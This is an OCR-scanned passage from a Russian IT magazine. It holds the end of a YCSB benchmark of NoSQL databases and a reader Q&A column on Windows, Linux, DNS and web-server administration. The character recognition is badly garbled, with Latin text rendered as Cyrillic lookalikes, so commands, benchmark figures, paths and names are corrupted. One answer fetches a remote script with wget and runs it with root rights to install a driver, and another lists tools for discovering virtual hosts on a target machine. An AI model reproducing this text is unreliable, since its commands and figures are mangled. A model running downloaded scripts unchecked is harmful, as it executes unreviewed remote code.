ҮС5В стартует с несколвкими потоками, запуска^ и,икл выполнени^ операи,ии 
в каждом из них, и все зто на однои машине. Име^ лишв четыре ^дра на однои кли- 
ентскои машине, доволвно грустно пытатвс^ запускатв там более четырех потоков. 
Поәтому мы запускали ҮС5В на восвми клиентских машинах одновременно. Дл^ ав- 
томатизаи,ии запуска мы исполвзовали Таопс и сгоп (точнее, ат). Неболвшои скрипт 
на Рутһоп формирует необходимые дл^ запуска ҮС5В команды на каждом клиенте, 
әти команды помеидакзтс^ в очередв ат на одно и то же врем^ на ближаишукз минуту 
в будушем на каждом клиенте. Потом срабатывает ат, и ҮС5В успешно (или не оченв, 
если ошиблисв в параметрах) запускаетс^ в одно и то же врем^ на всех восвми кли- 
ентах. Чтобы собратв резулвтаты (лог фаилы ҮС5В), снова исполызуетс^ Таопс. 
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Как работает ҮС5В Развертывание МопдоОВ 

РЕЗУЛЫАТЫ 

Итак, исходные резулвтаты — әто логи ҮС5В, с каждого клиента. Выггтд^т әти логи 
примерно так (показан финалвныи кусочек фаила): 

[КЕАО], 0рега±1ОП5, 1187363^ 

[КЕАО], Ке^гЈез, Ө 

[ КЕАР] , Ауега£е1_а1:епсуЈЧЈ5Х, 3876 . 5493619053314^ 

[КЕАР ] , МЈп Ј-аЈепсуГиз ). 162 



ЈДЕАО], Мах1_а*епсу(из) ^78190 
^КЕАО], дБ^ҺРегсе п^Ле^а^епсуСт^), 12 
[ КЕАР] ј 991:ҺРегсеп±11е1а1:епсу(т5)^2_ 
[КЕАР], Ке^игп^Ө, 1187363 
[0УЕКА1_1_], Кесоппес-_1оп5, 0.0 
[ОУЕКАИ], КипТЈте^тз), 303574.0 
[ОУЕКАИ], ОрегаиопБ ,^249984.0 

[ОУЕКАИ], Тһгоиеһри-_(ор5/5ес) Ј 4117.559474 7903315 

Как видишб, здесв еств количество операиии определенного типа (в данном приме- 
ре — чтени^), средн^^, минималвна^ и максималвна^ задержки, задержка, в кото- 
рукз уложилисв 95 и 99% операиии, количество успешных операиии (код возврата 
0), обшее врем^ теста, обшее количество всех операиии и среднее количество опе- 
раи,ии в секунду. Нас болвше всего интересует средн^^ задержка (Ауегаде1_атепсу) 
и количество операиии в секунду (Тһгоидһрит). 

С помоидыо очередного скрипта на Рутһоп данные из кучи логов собирали в та- 
бличку, а по табличке строили красивые графики. 



выводы 

N0501- БД разделилисв на две группы: быстрые и медленные. Быстрыми, как, соб- 
ственно, и ожидалосв, оказалисв кеу-уа1ие БД. Аегозрјке и Соисһһазе силһно опере- 
жакзт соперников. 

Аегозрјке деиствителвно оченв быстра^ БД. И нам почти получилосв доити 
до миллиона операиии в секунду (на данных в пам^ти). Аегозрјке весвма неплохо ра- 
ботает и на 550, особенно если учитыватв, что Аегозрјке в зтом режиме не исполв- 
зует кеширование данных в пам^ти, а на каждыи запрос обраидаетс^ к диску. Значит, 



в Аего5р1ке деиствителвно можно поместитв оолвшое количество данных ^пока хва- 
тит дисков, а не ОЗУ). 

Соисһһазе быстр, но быстр толвко на операи,и^х в пам^ти. На графиках с теста- 
ми 550 показана скороств работы Соисһһазе на обвеме данных лишб чутв болвше 
об^ема ОЗУ — всего 200 миллионов записеи. Әто заметно менвше 500 миллио- 
нов, с которыми тестировалисв другие БД. В Соисһһазе просто не удалосв вставитв 
болвше записеи, он отказывалс^ вытесн^тв кеш данных из пам^ти на диск и прекра- 
идал записв (операи,ии записи завершалисв с ошибками). Әто хорошии кеш, но лишв 
дгт данных, помеидакзидихс^ в ОЗУ. 

Са55апс!га — единственна^ БД, котора^ пишет быстрее, чем читает :). Әто оттого, 
что записв в неи успешно завершаетс^ (в самом быстром варианте) сразу после за- 
писи в журнал (на диске). А вот чтение требует проверок, несколвких чтении с диска, 
выбора самои свежеи записи. Са55апс!га — әто надежныи и доволвно быстрыи мас- 
штабируемыи архив данных. 

МопдоОВ доволһно медленна на записв, но относителвно быстра на чтение. Если 
данные (а точнее, то, что называкзт \л/огктд зе1: — набор актуалвных данных, к кото- 
рым посто^нно идет обраидение) не помеидакзтс^ в пам^тв, она силбно замедл^ет- 
с^ (а әто именно то, что происходит при тестировании ҮС5В). Также нужно помнитв, 
что у МопдоОВ суидествует глобалвна^ блокировка на чтение/записв, что может до- 
ставитв проблем при оченв высокои нагрузке. В и,елом же МопдоОВ — хороша^ БД 
дгт веба. 

РЗ 

Даваи немного отвлечемс^ от вопросов производителвности и посмотрим на то, 
как будут развиватвс^ далвше 501- и 1\1о501_-решени^. На самом деле то, что мы ви- 
дим сеичас, — зто повторение хорошо знакомои истории. Все әто уже было в шести- 
дес^тых и семидес^тых годах двадиатого века: до рел^иионных БД суидествовали 
иерархические, обвектные и прочие, и прочие. Потом захотелосв стандартизаи,ии, 
и по^вилс^ 501. И все сервезные СУБД, кажда^ из которых поддерживала свои соб- 
ственныи ^зык запросов и АР1, переклкзчилисв на 501. ^зык запросов и рел^иион- 
на^ моделв стали стандартом. Лкзбопытно, что сеичас тоже пытакзтс^ привитв 501 
к г\1о501_, что приводит к созданикз как оберток поверх суидествукзидих 1Чо501_, так 
и совершенно новых БД, которые называкзт Ые\л/501_. 

Если [\1о501_ решили отказатвс^ от «т^желого наследи^» 501, пересмотретв под- 
ходы кхраненикз данных и создали совершенно новые решени^, тотермином Ые\л/501_ 
называкзт движение по «возрожденикз» 501. Вз^в идеи из N0501-, реб^та воссоз- 
дали 501_-базы на новом уровне. Например, в мире Ые\л/501_ часто встречакзтс^ БД 
с хранением данных в пам^ти, но с полнои,енными 501_-запросами, обБединени^ми 
таблии, и прочими привычными веидами. Чтобы все же хранитв много данных, в әти 
БД встраивакзт механизмы шардинга. 

К Ые\л/501_ причиогткзт УоКОВ, ТокиОВ, МеплОВ и другие. Запомни әти имена, 
возможно, скоро о нихтоже будут говоритв на каждои ИТ-конферени,ии. _Е 



Алексеи 2етопс1 
Панкратов 

Зеш0пс1@дтаЈ1.сот 




ЕСТБ ВОПРОСЫ — ПРИСЫЛАИ 

НА ҒАО@РЕА1_.ХАКЕР.Р1Ј 



□ Сделал бзкап контроллера домена >ллп2к8г2 акронисом, после восста- 
новленил вывалилсл (ЈЗЫ НоНоаск. Что зто за зверв, что с ним делатв 
и как предотвратитв полвление? 

□ Сперва обратимс^ к теории. (ЈрсЈате Зедиепсе Ыиплоег (11514) — әто әлемент 
метаданных репликаи,ии, называемыи номером последователвного обновле- 
ни^. Каждыи контроллер домена поддерживает 11514, которыи ему спеи,ифичен. 
При внесении изменении в Астме ОЈгестогу к значеникз 1)5Ы прибавл^етс^ 1 . 115Ы су- 
идествует толвко в пределах контроллера домена, никакого отношени^ к 115Ы на со- 
седнем контроллере он не имеет. Дгт полноты понимани^ разберем пример. Еств 
контроллер тезт1 , у него 115Ы = 100 и тезт2 с 115Ы = 200. При изменении в АО первого 
контроллера тезт1 его 115Ы станет равным 101 . Таким образом происходит реплика- 
и,и^ со вторым КД. Теперв разберем, что будет при правилвном бәкапе контроллера. 
При восстановлении из образа һјдһезт \л/атегплагк 115Ы возвраидаетс^ в то состо^ние, 
которое было во врем^ бәкапа; при восстановлении АО поддерживаемым методом 
КД оповеидает партнеров по репликаиии, что был восстановлен, и сообидает им свои 
восстановленныи һјдһезт \л/атегплагк 115Ы. Те, зна^ из своего 113Ы гпдһ-\л/атегппагк 
уестог, вычиогткуг разнииу из 115Ы и определ^кзт, какие изменени^ нужны партнеру. 

При восстановлении из образа, созданного акронисом, проблема в том, что вос- 
становленныи КД ничего никому не сообидает и происходит ошибка 113Ы ВоПоаск. 
Дл^ восстановлени^ работы придетс^ с проблемного контроллера удал^тв Астме 
ОЈгестогу, затем очишдтв метаданные из АО и восстанавливатв ролв контроллера. 
Дл^ начала запустим утилиту 

сЈсргото /-Ғогсегетоуа! 

Теперв отклкзчаем контроллер и начинаем чиститв метаданные по статве от маикро- 
софт . 

□ Неожиданно в самыи нужныи момент кончилисв лии,ензии к РӘР. Какте- 
перв подклкзчитһсл к серверу, если нет физического доступа, чтобы 
убитв сессии? 

п 

ш Дгт зтого нужно вспомнитв синтаксис плзтзс 

т5т.5с [<фаил подклк)ченил>] [/у: <сервер[ : порт] >] [/асЈтЈп] [/-Ғ[и115сгееп] ] <-■ 
[/ш:<ширина>] [/һ:<высота>] [/риЫЈс] | [/5рап] [/есИт. "фаил подклгоченил"] <-■ 
Х/тЈ §гат:е] [/?] 

Из всего перечисленного нам нужен параметр /асЈплт. При исполвзовании әтого клк> 
ча с плзтзс-соединением не требуетс^ лии,ензии клиентского доступа (СА1_) Тегпгппа! 
Зеплсез. Даже если сервер терминала не принимает новых сеансов, все же можно 
создатв сеанс /асЈпгпп. Сеанс /асЈпгпп не учитываетс^ в счет предела, установленного 
на сервере терминала, с и,елыо ограничитв число сеансов. Таким образом, конечна^ 
команда будет иметв вид 



т5Т.5С /ас!тЈп 



На андроид-смартфоне постолнно выскакивает приложение зуоЈсе, сто- 
иттолвко нажатв на джоистик. Можно ли его как-то отклк>читв без гоот.-до- 
ступа? 

□ Конечно, можно, даже нужно! Дл^ зтого заходим в настроики, идем в диспет- 
чер приложении, там выбираем все приложени^ и находим зуоЈсе. Открываем 
и нажимаем «Отклкзчитв». Болвше он не по^витс^. 




Купил себе новыи ноут с предустановленнои №ш8, поставил рлдом Мш1 — 
и отвалилсл мулвтитач. Как его вернутв обратно, в двух системах? 



□ Дл^ әтого нужно поставитв драиверы натачпад ксвоеи модели ноутбука. Также 
нужно установитв утилиту дгт настроики, самые распространенные — әто 
Зтаг^Өез^ие, Е1ап!есһ и Зупар^сз. Они идут под определеннукз моделв тачпада, 
от чего и нужно отталкиватвс^ при выборе. На минте еств отделвна^ настроика. На- 
ходитс^ она в 

рге-Ғегепсез -> шоизе -> тоисһрас! 

где можно настроитв различное поведение тачпада на разные деистви^. 




Еств саит на И5 с огромным количеством директории, порлдка 150к. Листинг 
фаилов и сам саит весвма задумчивы. Лечитсл ли зто как-то на винде? 



□ Можно попробоватв отклкзчитв параметр 1\1^50Ј5аЫе1_а5{Ассе5511рс1а{е. 
По умолчаникз система 1ЧТҒ5, когда идет обраидение к фаилу или папке, каж- 
дыи раз делает обновление атрибута времени и даты последнего обраидени^. В ре- 
зулвтате обновлени^ болвших томов ЫТҒ5 әтот прои,есс снижает производителв- 
ноств системы. Чтобы әтого избежатв, необходимо выклкзчитв даннукз функи,икз 
в реестре, по адресу 

НК1М\5Ү5ТЕМ\Сиггеп1:Соп1:го15е-с\Соп1:го1\ҒЈ1е5у5-сет 

Значение ВЕӨ_0\/\/ОВО выставл^ем равным 1. Если случаи не т^желыи, әто должно 
помочв. 

Длл домена нужно сделатв несколвко А-записеи. Слышал, что еств ме- 
ханизм, которыи может мешатв аипишники и отдаватв их в случаином 
порлдке. Әто так? 

□ Совершенно верно. Называетс^ он гоипс! гоЫп. Әто один из методов распреде- 
лени^ нагрузки или отказоустоичивости за счет избыточного количества сер- 
веров, с помоидыо управлени^ ответами 0Ы5-сервера в соответствии с некои стати- 
стическои моделыо. В простеишем случае гоипс! гоЫп 0Ы5 работает, отвеча^ 
на запросы не одним 1Р-адресом, а списком из несколвких адресов серверов, пре- 
доставл^кзидих идентичныи сервис. Пор^док, в котором возврашакзтс^ 1Р-адреса 
из списка, основан на алгоритме гоипс! гоЫп. С каждым ответом последователвноств 
1Р-адресов мен^етс^. Как правило, простые клиенты обычно пытакггс^ устанавли- 
ватв соединени^ с первым адресом из списка, таким образом разным клиентам бу- 





дут выданы адреса разных серверов, что распределит ооидукЈ нагрузку между серве- 
рами. Но данна^ технологи^ не панаие^, и әтот алгоритм имеет несколвко 
суидественных недостатков, св^занных с кешированием записи в иерархии ВВ 0Ы5 
самого себ^, а также с кешированием на стороне клиента, выданного адреса и его 
повторного исполвзовани^, сочетание которых трудно управл^емо. 

Как правилвно установитв проприетарныи драивер длл №101А через кон- 
солв Ыпих? 

Дл^ әтого первоначалвно нужно остановитв иксы: 
5ис1о /ет_с/јпјт_.с1/тс1т 5т_ор 

или дс1т\кс1т\1с1т, в зависимости от того, что установлено. Затем скачатв скрипт 
и сделатв его исполн^емым: 

сс! /и5г/1оса!/Ып && ш§ет_ -!Мс 5тхј .ог§/5§-Ғхј && сһтос! +х 5§-ҒхЈ 
Теперв запускаем скрипт с нужными клкзчами: 
5 §-Ғхј -М пуЈсИа 

И выбираем необходимые пункты в менкз утилиты. Учитыва^, что у нас карта 1\М01А, 
запускаем скрипт еиде раз: 

5 §-ҒхЈ 

Теперв остаетс^ толвко перезагрузитвс^ и залогинитвс^ в иксы: 
5исЈо геһоот. 





Полезныи хинт 



ВИРТУАЛВНЫЕ ХОСТЫ 



□ 



* ш Как можно обнаружитв виртуалвные хосты? 

□ Термин «виртуалвныи хост» относитс^ к практике размеидени^ более чем одно- 
го веб-саита (например, \л/\л/\л/.соплрапу1 .сот и \лдлдл/.сотрапу2.сот) на однои 
машине. Виртуалвныи хост может бытв прив^занным к 1Р-адресу (что означает ис- 
полвзование отделвного 1Р-адреса дгт каждого саита) либо прив^занным к имени 
(әто позвол^ет иметв несколвко различных имен дгт каждого 1Р-адреса). Предполо- 
жим, у нас еств некии хостинг, у которого в наличии один сервер с одним выделен- 
ным 1Р (скажем, 89.89.89.89), и сто саитов на нем. Каждыи саит имеет свое уникалв- 
ное им^, но при зтом 1Р всех әтих саитов один и тот же, 89.89.89.89. Как әто 
возможно? Учитыва^, что у нас стоит сервер, әто можно реализоватв, редактиру^ 
фаил /е1с/һирс1/соп1/ҺНрс1.соп1 



<УЈгЧ:иа1Но51: *:8Ө> 



БегуегАсЈшЈп и5егпате1@ехашр1е . сот 

Роситеп1:Коо1: /һоте/и5егпате1/млЛ/\//и5ег1 . (ЈотаЈп . ги 

$ еГ у еГ 1\1 ате и5ег1.с!отаЈп. ги 

5егуегА1Ја5 млм. и5ег!с!отаЈп . ги 

Еггог1.о§ 1о§5/и5ег1с1отаЈп . ги-еггог_1о§ 

Си5"Еот1.о_ 1о%5/и5ег1с1отаЈп . ги-ассе55_1о§ соттоп 

</УЈгЧ:иа1Но5*:> 

<УЈгЧ:иа1Но51: *:8Ө> 

5егуегАс!тЈп и5егпате2@ехатр1е . ог§ 

РоситеггсКоо - !: /уаг/млллј/һ1:т1/и5ег2 . ехатр!е . ги 

5 ег у ег |\| ате и5ег2.ехатр!е. ги 

Еггог1.о% 1о§5/и5ег2.ехатр1е. ги-еггог_1о§ 

Си5"Еот1.о_ 1о§5/и5ег2.ехатр1е. ги-ассе55_1о§ соттоп 

</УЈг1:иа1Но51:> 

Чтобы обнаружитв все хосты удаленнои машины, нужно восполвзоватвс^ одним 
из следукзших способов. 
Если хост смотрит в инет: 

протестироватв через какои-либо онлаин-сервис, к примеру 2Јр.ги/с1отаЈп-1Јз1:-ру-Јр/ 

или лкзбои другои подобныи; 

• 5һос!ап — думакз, представл^тв не нужно :); 

можно исполвзоватв јһеНап/езЈег или все то же самое, что и дгт локалвных хо- 
стов. 

Если хост локалвныи: 

• НаЈоегсЈ ; 

• модулв метасплоита НТТР УЈгШа! Нозј Вгије Ғогсе Зсаппег : 

• Нозј-ехјгас! : 

• 2епплар — метод сканировани^ з1о\л/ сотргеһепзјуе зсап; 

• скрипт Ытар'а ҺНр-уһозЈз . 

Әти тулзы помогут в поиске виртуалвныххостов на конечнои машине. 



Встал вопрос апгреида дедлика. Нужно узнатв, еств ли на удаленном 
сервере свободные слоты под памлт_, сервер на РеЫап. 

п 

1_1 Дл^ әтого советукз восполвзоватвс^ командои 
5ис1о 15һш 




Команда выведет полнукз информаиикз об установленном железе, вклкзча^ пустые 



ОЈ \\Ј I Ы I ИЈД I 1с1М>1 I Е). 



Как можно устроитв нагрузочное тестирование веб-сервера? 

□ Предпагакз восполвзоватвс^ дгт әтого утилитои ао. Дл^ организаи,ии нагрузки 
нашему серверу в одну тыс^чу последователвных запросов команда будет 
иметв вид 



ас! -п 1000 һ1:1:р://1:е51:.ги:8Ө/-се5-с.һ-ст1 

В резулвтатах мы увидим информаи,икз о сервере и сами резулвтаты тестировани^: 



Сопсиггепсу 1_еүе1: 


1 


Лше т_акеп -Ғог т_е5т_5 


: 1.500 5есопс15 


Согш1ет_е гесше5т_5: 


1000 


ҒаПес! ге^ие5т_5: 0 


1л1г1т_е еггог^: 0 


Тот_а1 т_гап5-Ғеггес1 : 


453000 оут_е5 


НТМ1_ "сгап5-Ғеггес1 : 


177000 оут_е5 


Ке^ие5т_5 рег 5есопс1: 


666.58 [#/5ес] (шеап) 


Т1ше рег ге^ие^т.: 


1.500 [ш5] (шеап) 


Т1те рег ге^ие5"с: 


1.500 [ш5] (шеапЈ асго55 а11 сопсиггеггс ге^ие5т_5) 


Тгап5-Ғег гат_е: 294. 


88 ГКоүт_е5/5ес! гесе1үес1 





Еиде интересные отдии даннои утилиты: 

• с — оченв важныи параметр. Определ^ет количество параллелвных запросов, от- 



правл^емых одновременно; 

п — количество отправл^емых запросов; 

• 1: — максималвное количество секунд, отведенное на тест. Подходит дгт тестиро- 
вани^ приложени^ в течение определенного временного промежутка. При зтом 
необходимо задатв болвшое значение параметра -п; 

• С соокЈе-пагпе=уа1ие — добавл^ем соокје в каждыи запрос к серверу; 

• Н — задаем заголовок запроса; 

• Т — Соп.епЫуре заголовок запроса; 

• р — фаил, содержаидии тело РОЗТ-запроса. 

Например, дгт имитаи,ии тыс^чи одновременных запросов команда примет вид 

ао -п 1000 -с 1000 һт/Ер://т.е5Т..ги:8Ө/т.е5Т..һт.т1 

Возможно ли самому сделатв 
голосовое управление на Казроеггу Рј? 

□ Да! Дгт әтого советукз обратитвс^ к проекту Јазрег . Дл^ создани^ нужно мини- 
мум деталеи, а сам Јазрег уже содержит в себе готовые к исполвзованикз мо- 
дули. К примеру, можно узнатв погоду на сегодн^/завтра, еств ли новые писвма 
на гмеил и нет ли новых уведомлении на феисбуке. 





Т10НИНГ ВЕБ-СЕРВЕРА 

Хочу провести ткзнинг веб-сервера. Исполвзуетсл РеЫап + пдјпх + Му5Ө1_ + РНР. На сервере 
крутитсл около 40 саитов различнои величины. Естһ как простенһкие лендинги, так и круп- 
ные проекты, исполвзукзидие весвма нагруженные базы данных. Какие программные реше- 
нил можно применитв в данном случае длл более быстрои и устоичивои работы? 





Начал изучатв ЈауаЗспрт.. 

Какие онлаин-сервисы длл зтого посоветуешв? 



□ Один из последних сервисов подобного типа, которые ^ видел, — әто 
сосјесотоај.сот . Фишка его в том, что можно игратв в мулвтиплеер с другими 
живыми игроками-программистами. Все твои кзниты управл^кзтс^ исклкзчителвно 
программированием на Ј5. Дгт новичков еств кампани^, где можно в спокоинои об- 
становке изучитв основные функи,ии и писатв простенвкие сиенарии. Здесв нет тра- 
ДИ1ДИОННОГО подхода к ^зыку, когда нужно перелопатитв кучу теории и толвко потом 
написатв свои хеллоу ворлд. Здесв сразу в бои. Стоит учитыватв, что управление 
кзнитами и нападение на огров никак не поможет в написании техже саитов и одно- 
значно не заменит теоретические знани^. Но как быстрыи старт дгт обретени^ уве- 
ренности и понимани^ алгоритма поидет на все 100%. Да и какразвлекухатоже весв- 
ма ничего. Стоит отметитв и наличие русского ^зыка — тоже однозначныи плкзс. 





СОНТШ 



Примеруровн^ СосЈеСотһа! 

Хочу себе поставитв оконныи менеджер, какои можешв посоветоватв? 

□ Лично мне нравитс^ а\л/езопле — әто таилинговыи \Л/М, с возможностыо бытв 
и композитным. Часто полызовател^м требуетс^ компактноств (таилингова^ 
сторона зтого но иногда можно и поработатв в обычном режиме (композит- 
ном). Он легок, не нагружает проиессор, пространство әкрана исполызуетс^ оченв 
размеренно, и пустых мест не остаетс^. Настраиваетс^ при помоыди конфигураии- 
онного фаила, на скриптовом ^зыке 1_иа. Также еств поддержка плагинов, которые 
тоже, в свокз очередв, написаны на 1_иа. 

Готовые конфигураиионные фаилы можно наити здесы 





А\л/езоте 



ПОЛВЗА ВИРТУАЛВНЫХ столов 

Деиствителвно ли так нужны четыре виртуалвных стола на 11оип1:и? 




□ Әто оченвудобно, особенно когда много окон, браузеров и задач. Скажем, 
у мен^ на первом столе открыт почтовыи клиент и лиса, на втором хром с он- 
лаин-радио и личными вкладками, на третвем Ветпгппа с открытыми удаленными 
серверами, а на четвертом виртуалына^ машина дгш әкспериментов без отрыва 
от основных задач. Все на своих местах и по делу. 

□ С другои стороны, сколвко работал в винде, никогда потребности в дополнителв- 
ных рабочих столах не наблкздалосв. Если не знатв про них на убунту, то и полвзо- 
ватвс^ не будешв. Да и если что-то повисло, нужно еиде определитв, что и на каком сто- 
ле висит, плкзс полвзоватвс^ одновременно кучеи программ просто невозможно. Так 
что тут, пожалуи, дело привычки и желани^ разложитв все по полочкам. ГКГ 
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